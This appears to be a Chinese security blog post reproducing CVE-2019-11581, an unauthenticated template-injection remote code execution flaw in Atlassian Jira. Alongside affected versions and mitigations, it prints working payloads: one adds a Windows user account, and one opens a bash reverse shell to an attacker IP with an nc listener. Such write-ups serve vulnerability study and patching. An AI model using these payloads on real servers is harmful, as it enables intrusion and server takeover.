jira安装及配置_漏洞复现Jira未授权服务端模板注入远程代码执行

最新推荐文章于 2024-04-28 10:13:49 发布
最新推荐文章于 2024-04-28 10:13:49 发布
阅读量603 收藏 1
点赞数
文章标签: jira安装及配置 无法远程到非管理员账户 用户登录界面设计代码html 登录界面设计代码 邮箱无权访问 上的 jira是怎么回事
04bf3237ac5b0516af6927af21341a04.gif

1

漏洞描述

Jira是由Atlassian公司出品的一款项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。2019年7月12日根据安全情报得知Atlassian Jira Server和Jira Data Center存在服务端模板注入远程代码执行漏洞。成功利用此漏洞的攻击者可对运行受影响版本的Jira Server或Jira Data Center的服务器执行任意命令,从而获取服务器权限,严重危害网络资产

4bf312e5824eb8c06288dff04458bc54.gif

2

CVE编号

CVE-2019-11581

4bf312e5824eb8c06288dff04458bc54.gif

3

漏洞威胁等级

高危

4bf312e5824eb8c06288dff04458bc54.gif

4

影响范围

AtlassianJira 4.4.x

AtlassianJira 5.x.x

AtlassianJira 6.x.x

AtlassianJira 7.0.x

AtlassianJira 7.1.x

AtlassianJira 7.2.x

AtlassianJira 7.3.x

AtlassianJira 7.4.x

AtlassianJira 7.5.x

AtlassianJira 7.6.x < 7.6.14

AtlassianJira 7.7.x

AtlassianJira 7.8.x

AtlassianJira 7.9.x

AtlassianJira 7.10.x

AtlassianJira 7.11.x

AtlassianJira 7.12.x

AtlassianJira 7.13.x < 7.13.5

AtlassianJira 8.0.x < 8.0.3

AtlassianJira 8.1.x < 8.1.2

AtlassianJira 8.2.x < 8.2.3

4bf312e5824eb8c06288dff04458bc54.gif

5

漏洞简析

第一种,未授权代码执行利用条件:Jira已配置好SMTP服务器,且需开启“联系网站管理员表单”功能。(从WEB界面设计上看,实际上如果没配置SMTP服务器,无法开启此功能)第二种利用场景前提是拿到Jira管理员的权限,利用条件较难满足,这里主要分析第一种情况。 “ 原因在于 atlassian-jira/WEB-INF/classes/com/atlassian/jira/web/action/user/ContactAdministrators 未对 Subject(邮件主题)处进行过滤,用户传入的邮件主题被当作template(模板)指令执行。在任何一种情况下,成功利用此漏洞的攻击者都可在运行受影响版本的Jira Server或Jira Data Center的系统上执行任意命令。 ”

4bf312e5824eb8c06288dff04458bc54.gif

6

搭建环境

这里是安装AtlassianJira 7.13.0 

下载地址:
https://product-downloads.atlassian.com/software/jira/downloads/atlassian-jira-software-7.13.0-x64.exe  

安装教程:
https://www.cnblogs.com/houchaoying/p/9096118.html

efd0eb428d3eed674615d9c904c07b95.png

先登录管理员后台配置好联系管理员表单 

管理员表单默认是关闭的,需要配置好STMP才能开启

e7f86f5feb35bb2e9dd1937684a0730e.png

4bf312e5824eb8c06288dff04458bc54.gif

7

漏洞复现

无需管理员账户权限:

http://ip:port/secure/ContactAdministrators!default.jspa

需管理员账户权限:

http://ip:port/secure/admin/SendBulkMail!default.jspa

这里直接以未登录状态为例:  payload: $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('net user joecool joe@cool123 /add').waitFor() b64704d3136e152145be5065ab39e593.png

PS:大概需要等十几秒才能触发命令!!!

409e980d4fdd0ebb4e44fe657e83547e.png

linux下目标Jira系统可执行的POC:

$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('curl http://www.baidu.com').waitFor() $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('bash -i >& /dev/tcp/攻击者IP/2333 0>&1').waitFor() 

攻击者主机执行:

nc  -lvvp 2333

4bf312e5824eb8c06288dff04458bc54.gif

8

漏洞修复方案

1.更新到最新版本。   

2. 若无法及时升级 Jira,则可采取以下缓解措施     

(1)禁用“联系网站管理员”功能。设置=>系统=>编辑设置=>联系管理员表单处选择“关”,然后点击最下面的“更新”保存设置;     

(2)禁止对/secure/admin/SendBulkMail!default.jspa 的访问。

4bf312e5824eb8c06288dff04458bc54.gif

9

参考

https://paper.seebug.org/982/ 

https://www.heibai.org/post/1464.html 

https://www.jianshu.com/p/ddf1233d333f 

http://blog.nsfocus.net/cve-2019-11581-2/ 

https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html

 9649ef24e8c4a103c8fff370dfbccb57.gif

bbc83fb1af52097365c57122fd9f6132.gif

5c9badc464c6f2535449791721e2fcf9.png

往期精彩回顾

a1d33e8c75e4742392c551d3742eeadf.png

某Shop前台SQL注入

浅谈DNSlog注入

CVE-2015-1328、CVE-2017-16995Ubuntu本地提权漏洞复现

weixin_39552037
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Atlassian confluence漏洞分析合集
不忘初心,护天下安全!
06-22 416
Atlassian Confluence Server是澳大利亚Atlassian公司的一套协同软件服务器版本,具有企业知识管理功能,并支持用于构建企业WiKi。Atlassian Confluence Data Center 是 Atlassian Confluence 的数据中心版本。Confluence是一个专业的企业知识管理与协同软件,常用于构建企业wiki。 利用该漏洞可以读取服务器上任意文件6.1.0 ...
Jira7.10.1在Windows环境下的安装配置教程图解
09-30
JIRA配置灵活、功能全面、部署简单、扩展丰富。这篇文章主要介绍了Jira7.10.1在Windows环境下的安装配置教程图解,需要的朋友可以参考下
CVE-2019-8449:针对Jira v2.1的CVE-2019-8449漏洞-v8.3.4
03-08
CVE-2019-8449 低于v8.3.4的Jira版本的CVE-2019-8449 Exploit CVSS得分: 5.0 漏洞类型:信息泄露身份验证:不需要受影响的版本: 2.1-8.3.4 发布日期: 2019-09-11 漏洞数据库: : 描述 版本8.4.0之前的Jira中的/ rest / api / latest / groupuserpicker资源允许远程攻击者通过信息泄露漏洞枚举用户名。 用法 python CVE-2019-8449.py 链接
CVE-2019-8442:[Jira]授权敏感信息泄露
公众号shadow sock7
08-19 5903
https://note.youdao.com/ynoteshare1/index.html?id=4189e6fb21fb097a4109ac22f33b16cb&type=note 只是urlrewrite,不是那种直接读文件的,所以如果请求jsp的话,不会返回源码。只能读到一些不敏感的配置文件,所以影响有限。 ...
Atlassian Jira 信息泄露漏洞(CVE-2019-3403) 排查思路
最新发布
HeLLo_a119的博客
04-28 565
企业广泛使用的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。如果是正常的访问也会返回敏感数据,返回包中的敏感信息是正常的响应内容,所以他不算是一次攻击成功,算是误报。告警的检测规则是匹配响应中有没有返回数据包里面带有敏感信息的部分(检测URL和响应体)。如果是内部人员正常的操作,可以确定这是一次误报,但是不能确定他存不存在这个漏洞。2.通过受害者IP地址找到对应的人员并确认他们是否进行了可能的不当操作。信息泄露漏洞的告警。
最新系统漏洞--Atlassian Jira Server and Data Center访问控制错误漏洞
weixin_48555088的博客
03-21 3666
最新系统漏洞2022年3月15日 受影响系统: Atlassian Data Center >= 8.6.0 Atlassian Data Center < 8.5.10 Atlassian Data Center < 8.13.1 Atlassian JIRA Server >= 8.6.0 Atlassian JIRA Server < 8.5.10 Atlassian JIRA Server < 8.13.1 描述: CVE(CAN) ID: Atlassian J
【高危】Atlassian Confluence 远程代码执行漏洞
murphysec的博客
07-25 469
Confluence 是由 Atlassian 开发的知识管理与协同软件,通常在企业内部用作wiki系统。Confluence 7.19.8到8.2.0之前的版本中存在远程代码执行漏洞,具有登录权限的攻击者无需用户交互即可在 Confluence 服务器中执行任意命令。
JIRA.rar_jira_jira bug跟踪_jira pdf_jira工具使用
09-24
3. **工作流程**:JIRA支持灵活的工作流程配置,允许团队定义问题从创建到关闭的各个状态,以及状态间的转换规则。 4. **问题类型与优先级**:在JIRA中,问题可以被分类为任务、缺陷、改进等,每个问题类型有对应的...
jira_free_install.zip
05-04
1. 解压下载的"jira_free_install.zip"文件,获取安装程序。 2. 在服务器或本地机器上运行Jira安装程序,根据向导提示进行操作。 3. 设置Java环境,确保系统已安装Java Development Kit (JDK) 并配置好JAVA_HOME环境...
integration_jira::blue_square: Jira 集成到 Nextcloud
07-24
对于配置 Jira 帐户的用户,小部件中将显示指向“已连接帐户”用户设置部分的链接。 管理员设置 如果您想允许 Nextcloud 用户使用 OAuth 对 Jira Cloud 进行身份验证,还有一个“已连接帐户”管理设置部分。
项目管理之jira 9.1安装
第九系艾文
08-22 6209
项目管理之jira 9.1安装
atlassian-jira-software-8.17.1-x64.exe
08-03
jira8.17.1下载,windows安装
JIRA 启用远程 RPC 插件
12-28
对如何在 JIRA 中启用 RPC 调用进行了描述。 http://forums.hawebs.net/computer/viewthread.php?tid=5945&fromuid=426
Atlassian 修复Jira 中的完全读取SSRF漏洞
smellycat000的专栏
07-07 394
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Atlassian 公司的热门问题追踪和项目管理软件 Jira 易受一个服务器端请求伪造 (SSRF) 缺陷影响,在无需凭据的情况下即可遭滥用。Assetnote 公司的首席技术官兼创始人 Shubham Shah 在博客文章中指出,“根据Jira 实例的不同,有很多种方法可以在 Jira 上创建账户来利用该漏洞”,例如...
漏洞笔记--Jira 相关漏洞复现及利用
NoooEmotion的博客
01-28 4062
Atlassian Jira是企业广泛使用的项目与事务跟踪工具,被广泛应用于缺陷跟踪、客户服务、需求收集、流程审批、任务跟踪、项目跟踪和敏捷管理等工作领域。
jira 9.7.1和9.11.0(当前最新版)生产环境安装部署搭建
一粒小粟
09-06 7422
jira9.4.1新版安装部署
JIRA安装(带license)
中华传奇
12-17 644
JIRA是由Atlassian 公司(www.atlassian.com)开发的基于J2EE的问题跟踪管理系统,它正被广泛的被开源软件组织,以及全球著名的软件公司使用,它堪称是J2EE的Bugzilla。JIRA可以对各种类型的问题进行跟踪管理,包括缺陷、需求变更、评审记录等。 本文以atlassian-jira-enterprise-3.6.5-standalone在MySQL上安装和破解为例,...
CVE-2019-8451(Jira授权SSRF漏洞)
qq_41048303的博客
04-09 4690
CVE-2019-8451(Jira授权SSRF漏洞) 1.漏洞概述 jira的/plugins/servlet/gadgets/makeRequest资源存在ssrf漏洞。 2.环境搭建 使用docker 进行搭建 docker pull cptactionhank/atlassian-jira:7.8.0 docker run --detach --publish 8080:8080 cptactionhank/atlassian-jira:7.8.0 访问ip:8080进行安装jira,安装过程需
Atlassian 修复严重的 Jira 认证绕过漏洞
smellycat000的专栏
04-24 675
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Atlassian 公司发布安全通告提醒称,Jira 软件中存在一个严重漏洞,可被远程认证攻击者用于规避认证防护措施。该漏洞的编号是CVE-2022-0540,CVSS 评分为9.9,位于 Jira 认证框架 Jira Seraph 中。Viettel 网络安全公司的研究员 Khoadha 发现并报告了该漏洞Atla...
JIRA在LINUX中安装.docx
05-13
JIRA是一款在LINUX系统中安装使用的项目管理软件,可以帮助团队高效地协同工作。在安装JIRA之前,我们需要首先下载安装文件。可以从官方网站https://www.atlassian.com/software/jira/download下载JIRA 6.3.6 (TAR....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值